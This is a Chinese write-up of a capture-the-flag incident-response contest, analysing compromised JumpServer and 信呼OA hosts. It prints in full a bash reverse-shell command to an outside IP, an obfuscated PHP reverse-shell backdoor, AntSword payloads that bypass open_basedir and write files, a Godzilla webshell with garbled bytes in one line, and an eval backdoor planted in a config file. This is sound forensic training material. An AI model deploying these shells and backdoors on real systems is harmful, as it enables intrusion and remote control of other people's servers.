2024“中华武数杯” 全国网络攻防精英赛
场景2
弱密码登录
开始是一个jumpserver后台登录尝试弱密码admin/admin123进入
注意不要爆破不然会被禁止30分钟
后门账户
在用户管理页面找到管理用户,发现有两个其中一个是后门账户
黑客后门程序
查看进程和对应端口
ps -aux
找到进程执行反弹shell命令
bash -c bash -i >& /dev/tcp/181.32.44.99/9898 0>&1 &
或者看网络连接
netstat -anlupt
之后再tmp目录找到一个baidu.php后门, 并将混淆代码输出写到了注释里面
<?php
goto xVmgn;
fqEt0:
stream_set_blocking($pipes[0], 0);
goto InVPF;
IeHeL:
proc_close($process);
goto xV3Uc;
gXRc1:
while (1) {
if (feof($sock)) {
printit("\x45\122\122\117\x52\x3a\x20\x53\x68\145\x6c\154\40\143\x6f\156\156\145\143\164\x69\x6f\156\x20\x74\145\x72\155\151\x6e\141\x74\x65\x64");
break;
}
if (feof($pipes[1])) {
printit("\105\x52\122\x4f\x52\72\40\x53\x68\x65\x6c\x6c\x20\x70\x72\x6f\143\145\x73\x73\40\x74\145\x72\155\x69\x6e\141\x74\x65\144");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) {
printit("\x53\117\103\113\40\122\105\101\104");
}
$input = fread($sock, $chunk_size);
if ($debug) {
printit("\x53\x4f\x43\113\x3a\x20{$input}");
}
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) {
printit("\x53\124\104\x4f\125\x54\40\122\105\x41\104");
}
$input = fread($pipes[1], $chunk_size);
if ($debug) {
printit("\123\x54\x44\x4f\x55\124\x3a\x20{$input}");
}
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) {
printit("\x53\x54\x44\x45\x52\x52\40\122\105\x41\104");
}
$input = fread($pipes[2], $chunk_size);
if ($debug) {
printit("\123\x54\x44\x45\x52\x52\x3a\x20{$input}");
}
fwrite($sock, $input);
}
}
goto AZd0U;
rTceL:
#pcntl_fork
if (function_exists("\160\x63\156\164\154\137\146\157\x72\x6b")) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("\x45\x52\122\117\x52\72\40\103\x61\x6e\47\164\40\x66\x6f\x72\x6b");
die(1);
}
if ($pid) {
die(0);
}
if (posix_setsid() == -1) {
#ERROR: Can't fork
printit("\x45\x72\x72\x6f\162\72\x20\103\141\x6e\47\164\x20\x73\x65\164\x73\151\x64\x28\51");
die(1);
}
$daemon = 1;
} else { #WARNING: Failed to daemonise. This is quite common and not fatal.
printit("\x57\101\122\116\x49\116\x47\72\40\106\141\x69\154\x65\x64\x20\x74\157\40\x64\141\145\x6d\x6f\x6e\151\163\145\x2e\40\40\x54\150\x69\x73\40\x69\x73\x20\161\x75\x69\x74\145\x20\143\x6f\x6d\155\157\156\x20\141\x6e\144\40\x6e\x6f\164\x20\x66\x61\164\x61\x6c\x2e");
}
goto jmHuA;
RlaS8:
if (!$sock) {
printit("{$errstr}\x20\x28{$errno}\51");
die(1);
}
goto Uge_Q;
InVPF:
stream_set_blocking($pipes[1], 0);
goto JANIF;
QHXRE: #Successfully opened reverse shell to :
printit("\123\x75\143\143\x65\163\163\146\165\154\154\x79\40\157\160\x65\x6e\145\144\40\x72\x65\166\145\162\163\145\x20\163\x68\145\x6c\x6c\x20\164\157\40{$ip}\x3a{$port}");
goto gXRc1;
Zq8k_:
$error_a = null;
goto Wo4xn;
Wo4xn: #uname -a; w; id; bash -i
$shell = "\x75\x6e\x61\x6d\145\x20\x2d\x61\x3b\x20\167\x3b\x20\x69\x64\73\40\142\x61\163\150\x20\x2d\x69";
goto YKN_Y;
r30Sz:
fclose($pipes[1]);
goto O9FZs;
xVmgn:
set_time_limit(0);
goto NGebl;
xcFTT: #ERROR: Can't spawn shell
if (!is_resource($process)) {
printit("\x45\122\122\x4f\x52\72\x20\103\x61\x6e\x27\164\40\x73\160\141\x77\156\x20\163\x68\x65\x6c\x6c");
die(1);
}
goto wkPUB;
qcImP: #181.32.44.99
$ip = "\x31\x38\x31\x2e\63\62\56\64\64\56\71\x39";
goto uNuVg;
YKN_Y:
$daemon = 0;
goto BzzaA;
JANIF:
stream_set_blocking($pipes[2], 0);
goto Di1ZG;
Uge_Q: #pipe r
$descriptorspec = array(0 => array("\x70\151\160\145", "\x72"), 1 => array("\160\x69\160\x65", "\x77"), 2 => array("\x70\x69\x70\145", "\167"));
goto PE2Nh;
wkPUB:
function isHttpAlive($ip, $timeout = 2)
{ #http://
$url = "\150\164\x74\160\x3a\x2f\57{$ip}";
$context = stream_context_create(array("\150\x74\x74\x70" => array("\164\x69\155\145\x6f\x75\x74" => $timeout)));
$headers = @get_headers($url, 0, $context);
if ($headers && strpos($headers[0], "\x32\x30\60")) {
return true;
}
return false;
}
goto fqEt0;
pRr2Z:
$chunk_size = 1400;
goto dSZoi;
NhUwH:
fclose($pipes[0]);
goto r30Sz;
Di1ZG:
stream_set_blocking($sock, 0);
goto QHXRE;
DtngS:
umask(0);
goto xfXIP;
xV3Uc:
function printit($string)
{
if (!$daemon) {
print "{$string}\12";
}
}
goto AObOM;
AZd0U:
fclose($sock);
goto NhUwH;
NGebl:
$VERSION = "\x31\x2e\60";
goto qcImP;
O9FZs:
fclose($pipes[2]);
goto IeHeL;
uNuVg:
$port = 9898;
goto pRr2Z;
xfXIP:
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
goto RlaS8;
PE2Nh:
$process = proc_open($shell, $descriptorspec, $pipes);
goto xcFTT;
BzzaA:
$debug = 0;
goto FhswA;
dSZoi:
$write_a = null;
goto Zq8k_;
FhswA:
if (!isHttpAlive($ip)) {
die(0);
}
goto rTceL;
jmHuA:
chdir("\x2f");
goto DtngS;
AObOM:
场景一
Vulnerability-Wiki/docs-base/docs/oa/信呼OA-qcloudCosAction.php-任意文件上传漏洞.md at master · Threekiii/Vulnerability-Wiki
CVE-2023-1501
POST /index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=769871 HTTP/1.1
发现请求有代码传入 是CVE-2023-1773
http://39.101.137.133/?p=webmain&d=system&m=cog%7Ccog&ajaxbool=true&a=savecong
原文已经给了修改密码的步骤
后面寻找修改的密码
并且之后rce是将代码写入配置文件webmainConfig.php
流量中的木马命令
第一次传参的RCE代码可以看到如下
<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
$oparr = preg_split("/\\\\|\//", $opdir);
$ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
$tmdir = ".4fcb9f3038fe";
@mkdir($tmdir);
@chdir($tmdir);
@ini_set("open_basedir", "..");
for ($i = 0; $i < sizeof($oparr); $i++) {
@chdir("..");
}
@ini_set("open_basedir", "/");
@rmdir($ocwd . "/" . $tmdir);
};
function asenc($out)
{
return $out;
};
function asoutput()
{
$output = ob_get_contents();
ob_end_clean();
echo "c8" . "654";
echo @asenc($output);
echo "20a81" . "404fc0";
}
ob_start();
try {
$D = dirname($_SERVER["SCRIPT_FILENAME"]);
if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
$R = "{$D} ";
if (substr($D, 0, 1) != "/") {
foreach (range("C", "Z") as $L) if (is_dir("{$L}:")) $R .= "{$L}:";
} else {
$R .= "/";
}
$R .= " ";
$u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
$s = ($u) ? $u["name"] : @get_current_user();
$R .= php_uname();
$R .= " {$s}";
echo $R;;
} catch (Exception $e) {
echo "ERROR://" . $e->getMessage();
};
asoutput();
die();
最终结果突破open_basedir的限制,获取到了当前目录的路径以及用户名和系统信息
第二个解密流量的命令代码如下
<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
$oparr = preg_split("/\\\\|\//", $opdir);
$ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
$tmdir = ".51d10df2";
@mkdir($tmdir);
@chdir($tmdir);
@ini_set("open_basedir", "..");
for ($i = 0; $i < sizeof($oparr); $i++) {
@chdir("..");
}
@ini_set("open_basedir", "/");
@rmdir($ocwd . "/" . $tmdir);
};
function asenc($out)
{
return $out;
};
function asoutput()
{
$output = ob_get_contents();
ob_end_clean();
echo "151b" . "39961";
echo @asenc($output);
echo "a4e4" . "2039d";
}
ob_start();
try {
$D = dirname($_SERVER["SCRIPT_FILENAME"]);
if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
$R = "{$D} ";
if (substr($D, 0, 1) != "/") {
foreach (range("C", "Z") as $L) if (is_dir("{$L}:")) $R .= "{$L}:";
} else {
$R .= "/";
}
$R .= " ";
$u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
$s = ($u) ? $u["name"] : @get_current_user();
$R .= php_uname();
$R .= " {$s}";
echo $R;;
} catch (Exception $e) {
echo "ERROR://" . $e->getMessage();
};
asoutput();
die();
获取到了当前目录的位置以及windows主机名字和用户名
流量中响应结果
151b39961C:/phpstudy_pro/WWW\tC:\tWindows NT OA 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64\tAdministratora4e42039d
第四次
<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
$oparr = preg_split("/\\\\|\//", $opdir);
$ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
$tmdir = ".3ecc860f";
@mkdir($tmdir);
@chdir($tmdir);
@ini_set("open_basedir", "..");
for ($i = 0; $i < sizeof($oparr); $i++) {
@chdir("..");
}
@ini_set("open_basedir", "/");
@rmdir($ocwd . "/" . $tmdir);
};
function asenc($out)
{
return $out;
};
function asoutput()
{
$output = ob_get_contents();
ob_end_clean();
echo "c608" . "8f362";
echo @asenc($output);
echo "ef2" . "f47";
}
ob_start();
try {
echo @fwrite(fopen(base64_decode(substr($_POST["c32fac3bd31b3"], 2)), "w"), base64_decode(substr($_POST["q96d98f37ce4ea"], 2))) ? "1" : "0";;
} catch (Exception $e) {
echo "ERROR://" . $e->getMessage();
};
asoutput();
die();
传参的文件名如下,也就是把内容写入了config.php根据后续访问可以知道是一个哥斯拉木马
C:/phpstudy_pro/WWW/upload/config.php ·
#Halo AntSword!
第五次上传了一个webshell搜索发现是哥斯拉马
哥斯拉PHP马逐句解析 - 芥末炸弹 - 博客园
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D, $K){
for ($i = 0; $i < strlen($D); $i++) {
$c = $K[$i + 1 & 15];
$D[$i] = $D[$i] ^ $c;
}
return $D;
}
$pass = 'pass123';
$payloadName = 'payload';
$key = '63064e0e3090705b';
if (isset($_POST[$pass])) {
$data = encode(base64_decode($_POST[$pass]), $key);
if (isset($_SESSION[$payloadName])) {
$payload = encode($_SESSION[$payloadName], $key);
if (strpos($payload, "getBasicsInfo") === false) {
$payload = encode($payload, $key);
}
eval($payload);
$left = substr(md5($pass . $key), 0, 5);
$replacedString = str_replace("bdsek", $left, "var Rebdsek_config=");
header('Content-Type: text/html');
echo '<!DOCTYPE html>';
echo '<html lang="en">';
echo $replacedString;
echo base64_encode(encode(@run($data),$key));
echo ";";
echo 'document.getElementById("bdshell_js").src = "http://bdimg.share.baidu.com/static/js/shell_v2.js6················5·······························4(························s···········V6···r··`I··B·········X··· ······\· ·';
echo '</body>';
echo '</html>';
} else {
if (strpos($data, "getBasicsInfo") !== false) {
$_SESSION[$payloadName] = encode($data, $key);
}
}
}
pass传入的是远控命令,通过攻击荷载中的run()方法执行远控命令。然后对回显进行加密后传输给哥斯拉的服务端。
D盾扫了一下找到后门config.php和上面流量分析的一致
隐藏后门为webmain\webmainConfig.php也是流量中根据信呼OA的RCE漏洞写入进配置文件的与上面分析的一致
<?php
if(!defined('HOST'))die('not access');
//[
eval($_POST[1]);//]在2024-11-16 19:52:49通过[系统→系统工具→系统设置],保存修改了配置文件
return array(
'url' => '', //系统URL
'localurl' => '', //本地系统URL,用于服务器上浏览地址
'title' => '信呼协同办公系统', //系统默认标题
'apptitle' => '信呼OA', //APP上和手机网页版上的标题
'db_host' => '127.0.0.1', //数据库地址
'db_user' => 'root', //数据库用户名
'db_pass' => 'CaQsC6zVR', //数据库密码
'db_base' => 'xinhu', //数据库名称
'db_engine' => 'MyISAM',
'perfix' => 'xinhu_', //数据库表名前缀
'qom' => 'xinhu_', //session、cookie前缀
'highpass' => '', //超级管理员密码,可用于登录任何帐号
'db_drive' => 'mysqli', //操作数据库驱动有mysql,mysqli,pdo三种
'randkey' => 'pcywdgunofzqvsthbmxlraikje', //系统随机字符串密钥
'asynkey' => 'c57fa9c833f4a2c4e208261dddfc9926', //这是异步任务key
'openkey' => '', //对外接口openkey
'updir' => 'upload',
'sqllog' => false, //是否记录sql日志保存upload/sqllog下
'asynsend' => '', //是否异步发送提醒消息,0同步,1自己服务端异步,2官网VIP用户异步
'editpass' => '', //用户登录修改密码:0不用修改,1强制用户必须修改
'install' => true, //已安装,不要去掉啊
'xinhukey' => '', //信呼官网key,用于在线升级使用
'outurl' => '', //这个地址当你内网地址访问时向手机推送消息的地址
'reimtitle' => '', //REIM即时通信上标题
'qqmapkey' => '',
'platurl' => '',
'bcolorxiang' => '', //单据详情页面上默认展示线条的颜色
'officeyl' => '', //文档Excel.Doc预览类型,0自己部署插件,1使用官网支持任何平台
'useropt' => '', //1记录用户操作保存到日志里,空不记录
'defstype' => '1', //PC后台主题皮肤,可以设置1到34
'officebj' => '', //文档在线编辑,1官网提供或者自己部署
'officebj_key' => '', //文档在线编辑agentkey
'debug' => false, //为true调试开发模式,false上线模式
'reim_show' => false, //首页是否显示REIM
'mobile_show' => false, //首页是否显示手机版
'companymode' => false, //多单位模式,true就是开启
'loginyzm' => '', //登录方式:0仅使用帐号+密码,1帐号+密码/手机+验证码,2帐号+密码+验证码,3仅使用手机+验证码
'apptheme' => '', //系统或app的主题颜色
);
0 条评论
可输入 255 字